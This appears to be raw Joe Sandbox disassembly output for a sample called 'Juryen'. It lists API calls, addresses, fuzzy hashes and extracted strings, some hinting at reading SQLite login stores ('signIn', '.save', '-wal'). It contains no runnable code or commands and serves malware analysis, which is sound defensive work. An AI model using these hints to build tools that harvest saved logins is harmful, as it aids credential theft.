                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memchrmemset
                                                                    • String ID: PD$PD
                                                                    • API String ID: 1581201632-2312785699
                                                                    • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                    • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                    APIs
                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                    • String ID:
                                                                    • API String ID: 2163313125-0
                                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free$wcslen
                                                                    • String ID:
                                                                    • API String ID: 3592753638-3916222277
                                                                    • Opcode ID: 16b54fee0f637cae59fa932ab571a494c8bcd9845b7d0efff702067cfa1db6c1
                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                    • Opcode Fuzzy Hash: 16b54fee0f637cae59fa932ab571a494c8bcd9845b7d0efff702067cfa1db6c1
                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040A47B
                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                    • String ID: %s (%s)$YV@
                                                                    • API String ID: 3979103747-598926743
                                                                    • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                    • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
• wcslen.MSVCRT ref: 0040A6B1
• wcscpy.MSVCRT ref: 0040A6C1
• LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
• wcscpy.MSVCRT ref: 0040A6DB
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
APIs
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
• wcscpy.MSVCRT ref: 0040DAFB
• wcscpy.MSVCRT ref: 0040DB0B
• GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
Strings
• too many attached databases - max %d, xrefs: 0042F64D
• attached databases must use the same text encoding as main database, xrefs: 0042F76F
• database is already attached, xrefs: 0042F721
• out of memory, xrefs: 0042F865
• cannot ATTACH database within transaction, xrefs: 0042F663
• unable to open database: %s, xrefs: 0042F84E
• database %s is already in use, xrefs: 0042F6C5
APIs
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
• ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
• memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
• memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
• ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
• ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
• ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
APIs
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
• Sleep.KERNEL32(00000001), ref: 004178E9
• GetLastError.KERNEL32 ref: 004178FB
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
APIs
• memset.MSVCRT ref: 00407E44
• memset.MSVCRT ref: 00407E5B
• _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
• _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
• _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
• _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
• wcscpy.MSVCRT ref: 00407F10
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
APIs
• DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
• GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
• GetLastError.KERNEL32 ref: 0041855C
• Sleep.KERNEL32(00000064), ref: 00418571
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
• GetFileAttributesA.KERNEL32(00000000), ref: 00418581
• GetLastError.KERNEL32 ref: 0041858E
• Sleep.KERNEL32(00000064), ref: 004185A3
• free.MSVCRT ref: 004185AC
APIs
• memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
• memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
• memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
• memset.MSVCRT ref: 00413ADC
• memset.MSVCRT ref: 00413AEC
  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
• memset.MSVCRT ref: 00413BD7
• wcscpy.MSVCRT ref: 00413BF8
• CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
• wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
• wcslen.MSVCRT ref: 0040D1D3
• GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
• LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
• memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00411AF6
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                    • String ID: AE$.cfg$General$EA
                                                                    • API String ID: 776488737-1622828088
                                                                    • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                    • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                    • memset.MSVCRT ref: 0040D906
                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                    • String ID: sysdatetimepick32
                                                                    • API String ID: 1028950076-4169760276
                                                                    • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                    • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: -journal$-wal
                                                                    • API String ID: 438689982-2894717839
                                                                    • Opcode ID: 070149fd6e6b60b17c82d9fb7164138c534913cb2d5c63aa2997da2af33d5e6c
                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                    • Opcode Fuzzy Hash: 070149fd6e6b60b17c82d9fb7164138c534913cb2d5c63aa2997da2af33d5e6c
                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Dialog$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3975816621-0
                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                    APIs
                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                    • API String ID: 1214746602-2708368587
                                                                    • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                    • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                    • memset.MSVCRT ref: 00405E33
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                    • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                    • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                    • String ID:
                                                                    • API String ID: 2313361498-0
                                                                    • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                    • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                    • String ID:
                                                                    • API String ID: 2047574939-0
                                                                    • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                    • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                    APIs
                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                    • String ID:
                                                                    • API String ID: 4218492932-0
                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                    APIs
                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                    Strings
                                                                    Memory Dump Source
